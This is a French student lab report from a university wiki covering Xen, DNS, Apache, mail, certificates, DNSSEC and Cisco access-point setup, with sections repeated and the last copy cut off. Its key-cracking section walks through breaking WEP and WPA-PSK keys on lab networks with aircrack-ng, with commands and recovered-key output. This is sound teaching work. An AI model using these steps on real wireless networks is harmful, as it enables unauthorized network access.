<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[00:00:39] Tested 257766 keys (got 32866 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) <br />
1 0/ 1 EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) <br />
2 0/ 1 EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) <br />
3 0/ 1 EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) <br />
4 0/ 1 EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) <br />
5 1/ 2 EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) <br />
6 0/ 1 EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) <br />
7 0/ 1 EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) <br />
8 0/ 1 EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) <br />
9 0/ 1 EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) <br />
10 3/ 1 62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) <br />
11 5/ 1 68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) <br />
12 0/ 2 79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) <br />
<br />
KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] <br />
Decrypted correctly: 100%</pre><br />
<br />
=== Cassage de clé WPA-PSK ===<br />
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. <br />
Nous utilisons pour commencer<br />
<pre>airmon-ng start wlan2 </pre><br />
Puis<br />
<pre>airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F</pre><br />
--encrypt permet de sélectionner le type d'encryption souhaité.<br />
<pre> CH 6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
30:5A:3A:15:F6:3F -34 100 738 1323 26 6 54e WPA2 CCMP PSK Poneyus <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
30:5A:3A:15:F6:3F 74:29:AF:F3:FD:91 -16 1e- 1 75 265 <br />
30:5A:3A:15:F6:3F 04:DB:56:3D:FD:A2 -40 0e- 0e 4709 1367 </pre><br />
<br />
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option <i>handshake</i><br />
<br />
et nous pouvons utiliser la commande<br />
<pre> aircrack-ng Poney.cap dico.txt</pre><br />
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt <br />
Et au bout d'une heure nous parvenons à retrouver la clé WPA .<br />
<br />
<pre> Aircrack-ng 1.2 beta3<br />
<br />
<br />
[01:01:16] 2857196 keys tested (792.44 k/s)<br />
<br />
<br />
KEY FOUND! [ 02857193 ]<br />
<br />
<br />
Master Key : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 <br />
D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 <br />
<br />
Transient Key : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 <br />
C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 <br />
21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 <br />
22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 <br />
<br />
EAPOL HMAC : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35657TP sysres IMA2a5 2016/2017 G42016-12-06T11:07:37Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
<br />
<TABLE BORDER="1"> <br />
<CAPTION> Voici le titre du tableau </CAPTION> <br />
<TR> <br />
<TH> N° VLAN </TH> <br />
<TH> Prénom </TH> <br />
<TH> Réseau local </TH> <br />
<TH> Nom VM </TH> <br />
<TH> @IP VM </TH><br />
</TR><br />
<TR> <br />
<TH> VLAN20 </TH> <br />
<TD> Dimitri </TD> <br />
<TD> 10.60.20.0/24 </TD> <br />
<TD> Vald </TD><br />
<TD> 193.48.57.182/28 </TD> <br />
</TR> <br />
<TH> VLAN21 </TH> <br />
<TD> Nabil </TD> <br />
<TD> 10.60.21.0/24 </TD> <br />
<TD> Pnl </TD><br />
<TD> 193.48.57.177/28 </TD> <br />
</TR> <br />
<TH> VLAN22 </TH> <br />
<TD> Hugo </TD> <br />
<TD> 10.60.22.0/24 </TD> <br />
<TD> Gradur </TD><br />
<TD> 193.48.57.178/28 </TD> <br />
</TR> <br />
<TH> VLAN23 </TH> <br />
<TD> Otmane </TD> <br />
<TD> 10.60.23.0/24 </TD> <br />
<TD> Lartiste </TD><br />
<TD> 193.48.57.179/28 </TD> <br />
</TR> <br />
<TH> VLAN24 </TH> <br />
<TD> Clement </TD> <br />
<TD> 10.60.24.0/24 </TD> <br />
<TD> Gringe </TD><br />
<TD> 193.48.57.180/28 </TD> <br />
</TR> <br />
<TH> VLAN25 </TH> <br />
<TD> Joan </TD> <br />
<TD> 10.60.25.0/24 </TD> <br />
<TD> Orelsan </TD><br />
<TD> 193.48.57.181/28 </TD> <br />
</TR> <br />
</TABLE> <br />
<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés<br />
<pre>dmesg | grep tty</pre><br />
<br />
Pour configurer notre Cisco, on utilise <i>minicom -os</i> et pour cela nous devons être en root<br />
<br />
Une fois minicom lancé, on vient changer les paramètre de notre Cisco<br />
<br />
<pre>A - Serial Device : /dev/ttyUSB0<br />
B - Lockfile Location : /var/lock <br />
C - Callin Program :<br />
D - Callout Program :<br />
E - Bps/Par/Bits : 9600 8N1<br />
F - Hardware Flow Control : No<br />
G - Software Flow Control : No<br />
</pre><br />
<br />
On se connecte en admin sur le Cisco <br />
<Pre>enable<br />
config terminal<br />
</pre><br />
<br />
Configuration du SSID<br />
<pre>dot11 ssid MAMENE<br />
authentication open<br />
guest-mode<br />
</pre><br />
<br />
Configuraiton de l'interface Dot11Radio0<br />
<pre><br />
interface Dot11Radio0<br />
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key<br />
encryption mode wep mandatory<br />
</pre><br />
<br />
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés<br />
<pre>access-list 701 permit 5cb9.0180.a039 0000.0000.0000<br />
access-list 701 permit 3ca8.2a7a.05c5 0000.0000.0000<br />
access-list 701 permit 7429.aff3.fd91 0000.0000.0000<br />
access-list 701 permit 5cb9.0180.a139 0000.0000.0000</pre><br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
=== Installation du serveur HTTP ===<br />
<pre> apt-get install apache2 </pre><br />
=== Installation du serveur DNS ===<br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
===Configuration de notre nom de domaine===<br />
<br />
Après l'achat de notre nom de domaine <i>orelsan.website</i> sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine<br />
dns.orelsan.webiste -> 193.48.57.181<br />
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.<br />
Puis nous allons modifier 3 fichiers :<br />
<br />
<i>/etc/bind/named.conf.options</i><br />
<pre>options {<br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ; //passerelle de gandi par defaut<br />
};</pre><br />
<i>/etc/bind/named.conf.local </i><br />
<pre>//<br />
// Do any local configuration here<br />
//<br />
<br />
// Consider adding the 1918 zones here, if they are not used in your<br />
// organization<br />
//include "/etc/bind/zones.rfc1918";<br />
<br />
zone "orelsan.website" {<br />
type master;<br />
file "/etc/bind/orelsan.website/orelsan";<br />
};<br />
</pre><br />
<i>/etc/bind/orelsan.website/orelsan</i><br />
<pre>$TTL 259200<br />
@ IN SOA dns postmaster.orelsan.website. (<br />
20 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns<br />
IN NS ns6.gandi.net.<br />
IN A 193.48.57.181<br />
IN MX 100 dns<br />
<br />
dns IN A 193.48.57.181<br />
</pre><br />
<br />
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:<br />
<pre>service bind9 stop<br />
service bind9 start</pre><br />
<br />
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur<br />
<br />
<i>cat /var/log/daemon.log</i><br />
<br />
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement<br />
Si tout cela fonctionne on peut se rendre sur notre page.<br />
Pour modifier les informations visible sur la page, il suffit d'aller dans <br />
<i>/var/www/html/index.html</i>. Toutes les informations écrites dans ce fichier seront visible sur notre page.<br />
<br />
===Installation boite mail===<br />
<br />
On commence par un installer postfix qui est un serveur de messagerie électronique.<br />
<pre>apt-get install postfix</pre><br />
<br />
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration<br />
<br />
Dans <i>/etc/aliases</i> on ajoute:<br />
<pre>admin:root</pre><br />
<br />
Puis on utilise la commande<br />
<pre>newaliases</pre><br />
<br />
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.<br />
<pre>apt-get install bsd-mailx</pre><br />
<br />
Et pour observer nos mail, on tape la commande <i>mail</i> dans la console.<br />
L'adresse mail est admin@orelsan.website.<br />
<br />
===Générer une demande de certificat en SHA 2===<br />
<pre>openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr<br />
<br />
Country Name (2 letter code) [AU]:fr<br />
State or Province Name (full name) [Some-State]:North<br />
Locality Name (eg, city) []:Lille<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech<br />
Organizational Unit Name (eg, section) []:IMA<br />
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website<br />
Email Address []:admin@orelsan.website<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
</pre><br />
<br />
Cette fonction nous crée 2 fichiers :<br />
monserveur.key serveur.csr<br />
<br />
-monserveur.key contient la clé privée.<br />
<br />
-serveur.csr contient la clé public.<br />
<br />
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.<br />
On crée 2 fichier avec :<br />
<br />
-inter.crt qui contient le certificat intermédiaire.<br />
<br />
-gandi.crt qui qui contient le certificat .<br />
<br />
<pre>root@Orelsan:~# ls<br />
gandi.crt inter.crt mbox monserveur.key serveur.csr</pre><br />
<br />
Dans le fichier <i>/etc/apache2/sites-enabled/000-default.conf</i> on écrit: <br />
<pre><VirtualHost *:443><br />
<br />
ServerName www.orelsan.website<br />
ServerAlias orelsan.website<br />
DocumentRoot /var/www/html<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SLCertificateFile /root/gandi.crt<br />
SSLCertificateKeyFile /root/monserveur.key<br />
SSLCertificateChainFile /root/inter.crt<br />
SSLVerifyClient None<br />
</VirtualHost></pre><br />
<br />
=== DNSSEC ===<br />
<br />
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier <i>named.conf.options</i><br />
<pre>dnssec-enable yes </pre><br />
<br />
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :<br />
<pre>dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website <br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website<br />
</pre><br />
<br />
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone <br />
<pre>$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key<br />
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key </pre><br />
<br />
et pour signez les enregistrements de la zone, nous utilisons la commande :<br />
<pre>dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk</pre><br />
<br />
== Cassage clé ==<br />
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau<br />
=== Cassage de clé WEP ===<br />
Commençons par detecter notre interface wifi par le biais d'un<br />
<pre>ifconfig</pre><br />
ou<br />
<pre>iwconfig</pre><br />
<br />
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.<br />
<br />
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par <br />
<pre>airmon-ng start wlan2 </pre><br />
Cette commande permet de mettre en mode moniteur notre interface wifi<br />
Si tout se passe correctement, vous allez voir apparaitre<br />
<pre>creation du mon0<br />
<br />
Interface Chipset Driver<br />
<br />
mon0 Ralink RT2870/3070 rt2800usb - [phy1]<br />
wlan0 Broadcom wl - [phy0]<br />
wlan2 Ralink RT2870/3070 rt2800usb - [phy1]<br />
(monitor mode enabled on mon1)<br />
</pre><br />
Nous observons bien que le mode moniteur est activé pour notre wlan2.<br />
<br />
Nous pouvons observer tous les réseaux grâce à la commande <br />
<pre>airodump-ng wlan2</pre><br />
<br />
Une fois que nous avons repéré la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte<br />
<pre>airodump-ng wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack</pre><br />
<br />
-c permet de le selectrionner le channel de communication<br />
-w le nom du fichier dans lequel airodump va enregistrer les données<br />
--bssid permet d'indiquer l'adresse mac de la cible <br />
--essid permet d'indique le ssid de la cible (nom du réseau)<br />
<br />
<pre>CH 8 ][ Elapsed: 1 min ][ 2016-11-21 15:08 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:52 -41 45 799 53316 506 8 54e. WEP WEP cracotte03 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -28 54e-54e 222 60221</pre> <br />
<br />
On peut visualiser le nombre de paquets qui transit. <br />
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.<br />
<pre>root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2<br />
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)<br />
15:00:01 Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8<br />
<br />
15:00:01 Sending Authentication Request (Open System)<br />
<br />
15:00:03 Sending Authentication Request (Open System)<br />
<br />
15:00:05 Sending Authentication Request (Open System) [ACK]<br />
15:00:05 Authentication successful<br />
15:00:05 Sending Association Request [ACK]<br />
15:00:05 Association successful :-) (AID: 1) </pre><br />
<br />
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal<br />
<pre>root@Piranha:/home/pifou#aircrack-ng crack.cap <br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
